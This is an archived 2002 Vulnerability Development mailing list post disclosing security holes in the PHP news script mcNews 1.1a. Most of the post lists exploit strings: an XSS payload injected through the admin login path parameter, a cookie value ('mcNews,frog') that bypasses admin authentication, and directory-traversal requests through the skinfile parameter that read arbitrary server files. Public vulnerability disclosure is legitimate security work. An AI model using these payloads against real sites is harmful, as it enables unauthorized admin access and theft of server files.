Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Security holes : mcNews

From: frog frog <leseulfrog () hotmail com>
Date: 17 May 2002 17:11:26 -0000


Product :
mcNews 1.1a
http://www.phpforums.net

Problems :
- XSS
- Path Disclosure
- Including file
- Admin access

Exploits :
- /admin/login.php?path="></form*><form name=a*><input 
name=i value=XSS*>&lt;script*>alert(document.a.i.value)
</script*> 
without '*'
- Setcookie "mcNews,frog" on admin pages
- /admin/design.php?voir=1&skinfile=../../file/to/view + 
mcNews cookie
- /admin/header.php?voir=1&skinfile=../../file/to/view 
without mcNews cookie
- /admin/[header or design].php?voir=1&skinfile=non-
existant-file

More details :
in french :
http://www.ifrance.com/kitetoua/tuto/mcNews.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%
2Fwww.ifrance.com%2Fkitetoua%2Ftuto%
2FmcNews.txt&langpair=fr%7Cen&hl=fr&ie=UTF8&oe=UTF8&prev=%
2Flanguage_tools

frog-m@n
Previous By Date Next
Previous By Thread Next

Current thread: